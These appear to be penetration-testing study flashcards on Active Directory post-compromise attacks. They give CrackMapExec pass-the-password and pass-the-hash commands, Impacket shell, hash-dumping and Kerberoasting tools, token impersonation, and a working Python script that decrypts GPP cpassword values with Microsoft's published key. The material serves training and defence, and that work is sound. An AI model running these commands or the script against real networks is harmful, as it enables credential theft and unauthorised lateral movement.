Active Directory: Post-Compromise Attacks Flashcards
What is CrackMapExec?
It’s a post-compromise tool for penetration testing against Windows and Active Directory networks. It enumerates hosts, shares, sessions and users over protocols such as SMB and, more importantly, takes credentials you have already obtained and tries them against many machines at once, which is what makes it useful for lateral movement.
What is a Pass the Password Attack?
It’s an attack where the attacker reuses a cleartext password obtained earlier in the engagement to authenticate to other machines. With CME you can try one set of credentials against every host in a subnet in a single run and see which machines accept them, and on which of them the account is a local administrator.
What command can be used to perform a Pass the Password attack? What should you look for in the output?
$ crackmapexec smb network_ip/CIDR -u username -d domain.name -p password
After running it, look at the marker on each host line: “[-]” means the logon failed, “[+]” means the credentials are valid on that host, and “[+] … (Pwn3d!)” means CME could also reach the ADMIN$ share, i.e. the account is a local administrator there and you can execute code remotely. Trying one known-good credential against many hosts does not trigger account lockout; spraying many passwords against one account does.
The Pwn3d machines (Pass the Password attack): what tool can be used to get a shell?
psexec.py (Impacket). It writes a service executable to the target’s ADMIN$ share and starts it over SMB, which is why it only works on the Pwn3d hosts, and the shell it returns runs as SYSTEM.
The Pwn3d machines (Pass the Password attack): what tool can be used to dump SAM hashes?
secretsdump.py (Impacket). It dumps the local SAM hashes remotely over SMB (along with the LSA secrets and cached domain logons on the same host) without needing an interactive shell; the NT hashes it returns feed directly into a Pass the Hash attack.
What is a Pass the Hash attack?
It’s a type of attack where the attacker authenticates with a captured NTLM hash instead of the cleartext password. NTLM authentication only ever needs the hash, so there is nothing to crack; the attacker reuses it to authenticate to other machines and move laterally. It works against NTLM, not Kerberos.
What command can be used to perform a Pass the Hash attack? What should you look in the output?
$ crackmapexec smb network_ip/CIDR -u username -H hash --local-auth
You should look for the same markers as before: the green “[+]” means the hash was accepted on that host, and “(Pwn3d!)” means the account is a local administrator there. The “-H” option takes the NT hash (an “LM:NT” pair is also accepted), and “--local-auth” authenticates against each host’s local SAM rather than the domain, which is how a local Administrator hash shared by machines built from the same image is reused across them. Note that by default only the built-in Administrator (RID 500) gets a full administrative token over the network; other local admin accounts show “[+]” without “(Pwn3d!)” unless LocalAccountTokenFilterPolicy is set to 1.
What are the two types of access tokens?
- Delegation Tokens: created when a user logs on interactively (console logon, RDP) with their credentials. They can be used to authenticate to other systems on the network on that user’s behalf.
- Impersonation Tokens: created when a user logs on non-interactively (mounting a network share, a logon script, a service), so the user is not prompted for credentials. They can only be used on the local machine. This type of token is usually created after a delegation token exists and reuses the credentials established by that earlier interactive authentication.
What is Token Impersonation?
It’s a Windows post-compromise technique where an attacker steals the access token of a user who is logged on to the compromised machine, without knowing that user’s credentials, and impersonates them to perform actions with their level of privilege.
What can be achieved with token impersonation?
This technique is effective for privilege escalation and lateral movement: if a logged-on user is a domain admin, the attacker obtains domain admin privileges by impersonating them, and a stolen delegation token can be used to authenticate to other domain machines and pivot through the network (for example, to add a new domain user).
What is the requirement to perform a token impersonation?
The attacker must already have local administrator (or SYSTEM) privileges on the target machine, since reading another process’s token requires them (in practice the SeImpersonatePrivilege that these accounts hold). Token impersonation raises privilege within the domain, not on the box itself.
For how long is an access token available on a machine?
Until the machine is rebooted. A delegation token left behind by a domain admin who logged on days ago can therefore still be stolen, which is why administrators should avoid interactive logons to workstations and why rebooting clears the exposure.
What is Kerberoasting?
It’s a post-exploitation technique that abuses normal Kerberos behaviour: any domain user can request a service ticket (TGS) for any service principal name (SPN), and a ticket for an SPN tied to a user account is encrypted with that service account’s password hash. The attacker requests such tickets and cracks them offline, which never touches the service account’s logon counter and so avoids AD account lockouts.
The steps are:
1. The attacker authenticates as any domain user (a password or an obtained NTLM hash both work) and requests a TGT;
2. Receives the TGT and, presenting it, requests a TGS for a service account’s SPN;
3. Receives the TGS, whose encrypted part is encrypted with the service account’s password hash (the NT hash when the ticket uses RC4-HMAC, encryption type 23);
4. Cracks the TGS offline: for each password guess, derive the key and check whether it decrypts the ticket. A hit yields the service account’s cleartext password.
Important: these requests (for the TGT and the TGS) are all made to a domain controller (the KDC); the service itself is never contacted. Because ticket requests are normal Kerberos traffic, the usual detection hint is a burst of event ID 4769 entries requesting RC4 (0x17) tickets for user-account SPNs.
Kerberoasting
What tool can be used to grab a TGS?
GetUserSPNs.py (Impacket). It lists the user accounts that have an SPN and, with “-request”, requests a TGS for each and prints it in the “$krb5tgs$…” format that hashcat (mode 13100 for RC4-HMAC tickets) and John the Ripper crack directly.
What is GPP and how it can be attacked?
Group Policy Preferences is a feature that gives administrators advanced functionality for creating and managing settings in a Windows domain, including creating local accounts or changing local account passwords on every machine a policy applies to, with the credentials embedded in the policy.
For security, these embedded credentials are encrypted with AES-256 and stored in the cpassword attribute of an XML file (Groups.xml for local accounts; Services.xml, ScheduledTasks.xml, DataSources.xml and Drives.xml can carry one too) inside the policy folder on the domain controllers’ SYSVOL share. The main problem is that the AES key was published by Microsoft in its own documentation, and SYSVOL is readable by every authenticated domain user, so any attacker with a domain account who finds a cpassword can decrypt it. Microsoft removed the ability to set passwords through GPP in MS14-025 (KB2962486), but the patch does not delete existing XML files, so old policies are still worth searching for.
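The decryption the card describes takes a few lines once the key is known. The following is an added example, not code from the page or from Microsoft: it scans a Groups.xml for cpassword attributes and decrypts them with the published AES-256 key (zero IV, PKCS#7-padded UTF-16LE plaintext, base64 without padding characters). The XML, account name and GUIDs are constructed; the cpassword value is the widely published test vector whose plaintext is GPPstillStandingStrong2k18. AES comes from the cryptography package, with pycryptodome as a fallback (assumed to be installed; neither ships with Python).

```python
import base64
import xml.etree.ElementTree as ET

# AES-256 key Microsoft published for GPP cpassword (MS-GPPREF, "Password Encryption").
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)

# Constructed Groups.xml, as found under SYSVOL\<domain>\Policies\{GUID}\Machine\Preferences\Groups\.
# Account name and GUIDs are invented; the cpassword is the published test vector.
SAMPLE_GROUPS_XML = """\
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="corp.local\\svc_backup" image="2"
        changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
        changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="corp.local\\svc_backup"/>
  </User>
</Groups>
"""


def find_cpasswords(xml_text: str) -> list:
    """Return (account, cpassword) for every element carrying a non-empty cpassword.

    The same scan works on Services.xml, ScheduledTasks.xml, DataSources.xml and
    Drives.xml, which name the account in accountName/runAs rather than userName.
    """
    found = []
    for elem in ET.fromstring(xml_text.encode("utf-8")).iter():
        cpassword = elem.attrib.get("cpassword")
        if cpassword:
            account = (elem.attrib.get("userName")
                       or elem.attrib.get("accountName")
                       or elem.attrib.get("runAs")
                       or "")
            found.append((account, cpassword))
    return found


def gpp_decrypt(cpassword: str) -> str:
    """AES-256-CBC with a zero IV; the stored base64 lacks its '=' padding."""
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    iv = bytes(16)
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        dec = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(iv)).decryptor()
        padded = dec.update(raw) + dec.finalize()
    except ImportError:
        from Crypto.Cipher import AES  # pycryptodome fallback
        padded = AES.new(GPP_AES_KEY, AES.MODE_CBC, iv).decrypt(raw)
    pad = padded[-1]
    if not 1 <= pad <= 16:
        raise ValueError("bad PKCS#7 padding: not a GPP cpassword or wrong key")
    return padded[:-pad].decode("utf-16-le")


if __name__ == "__main__":
    for account, cpassword in find_cpasswords(SAMPLE_GROUPS_XML):
        print(f"{account}: {gpp_decrypt(cpassword)}")
```

In an engagement the XML comes from `\\<dc>\SYSVOL\<domain>\Policies\`, reachable with any domain account, which is why this is a post-compromise technique rather than an unauthenticated one. Finding a cpassword is also a finding in itself: the patched management console can no longer create them, so their presence dates the policy to before MS14-025.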